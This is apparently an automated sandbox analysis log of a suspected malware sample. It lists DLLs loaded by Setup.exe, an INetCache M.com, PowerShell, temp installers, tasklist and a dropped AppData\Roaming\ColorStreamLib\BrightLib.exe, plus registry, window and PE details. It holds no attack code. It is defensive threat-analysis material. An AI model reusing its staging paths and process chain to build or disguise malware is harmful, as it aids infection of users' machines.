        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wtsapi32.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: winsta.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: rstrtmgr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: explorerframe.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: dlnashext.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wpdshext.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: edputil.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: appresolver.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: slc.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sppc.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
        Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
        Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
        Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wsock32.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: version.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: iconcodecservice.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: windowscodecs.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: textshaping.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: twinui.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: powrprof.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: pdh.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: umpdc.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: shdocvw.dll
        Source: C:\Users\user\Desktop\Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Window found: window name: TMainForm
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: Setup.exe Static file information: File size 73424035 > 1048576
        Source: Setup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2553928268.0000000002699000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb| source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbT\ source: powershell.exe, 00000011.00000002.2558473325.0000000006E7A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ilit.pdb source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
